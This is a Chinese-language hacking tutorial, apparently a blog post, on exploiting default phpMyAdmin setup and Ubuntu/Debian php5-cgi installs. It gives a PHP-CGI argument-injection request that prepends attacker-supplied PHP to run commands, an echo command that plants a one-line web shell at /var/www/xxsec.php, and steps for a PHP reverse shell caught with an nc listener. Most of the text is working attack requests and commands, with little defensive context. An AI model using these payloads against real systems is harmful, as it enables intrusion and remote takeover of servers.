默认安装漏洞

phpmyadmin/setup默认安装

ubuntu/debian默认安装php5-cgi

 

phpmyadmin/setup默认安装

 

使用?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1对php.ini文件做试探）

POSThttp://192.168.1.12/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1

Host: 192.168.1.12

Content-Length: 34

 

<?php

passthru('id'); ##使用passthru函数，执行命令，比如ls，cat等，如果可以执行，也可以写一句话木马进去

die(); ##die函数，不执行以下的操作

?>

点击那个笔，把设置好对应的端口

点击go，帐号就显示出来了（www权限）

pwd命令

 

写入网页木马

echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" >/var/www/xxsec.php

写好木马后即可执行命令

 

 

反弹shell

 

把php-reverse-shell.php拷贝到其他目录，然后编辑它，把ip地址变成攻击机

编辑后保存，把内容发送到目标机器上（因为它是反弹链接，所以发送前，先用nc监听好端口）

我反弹shell上的反弹的1234端口，用nc监听1234端口，发送后就会反弹到nc会话

 

 

 

ubuntu/debian默认安装php5-cgi，可以直接访问/cgi-bin/php5和cgi-bin/php（这个目录是爬不出来的）

-d allow_url_in clude=on -d safe_mode= off -d suhosin.simul ation=on -d disa

把这些代码复制到burp编码为url，否则执行不了，

这里的host主机头必须有，使用system函数执行命令<?php echo system('id'); die(); ?>

查看所有用户信息

也可以让主机监听一个端口，我们用nc连接这个端口，但是可能会被防火墙拦

 

 

友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn